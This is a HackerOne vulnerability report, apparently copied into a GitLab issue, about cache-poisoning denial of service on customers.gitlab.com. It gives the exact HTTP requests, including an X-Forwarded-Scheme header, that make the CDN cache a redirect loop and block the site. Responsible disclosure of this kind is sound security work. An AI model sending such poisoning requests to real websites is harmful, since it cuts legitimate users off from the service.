Cache Poisoning DOS in customers.gitlab.com
HackerOne report #2282885 by 0xdln
on 2023-12-13, assigned to @cmaxim:
Report | Attachments | How To Reproduce
Report
Sending the x-forwarded-scheme: http
header would result into a 301 redirect to the same location. Since the response was cached by a CDN, it would cause a redirect loop, inherently denying access to the website.
Steps to reproduce:
- To poison, make the following request:
GET /test.js?cb=123 HTTP/2
Host: customers.gitlab.com
X-Forwarded-Scheme: http
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Cache-Control: max-age=0
- Verify that it has been poisoned (with no
X-Forwarded-Scheme
header):
GET /test.js?cb=123 HTTP/2
Host: customers.gitlab.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Cache-Control: max-age=0
- Open the url https://customers.gitlab.com/test.js?cb=123 in the browser and the website will be inaccessible
Impact
An attacker can block access to customers.gitlab.com and make files inaccessible
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: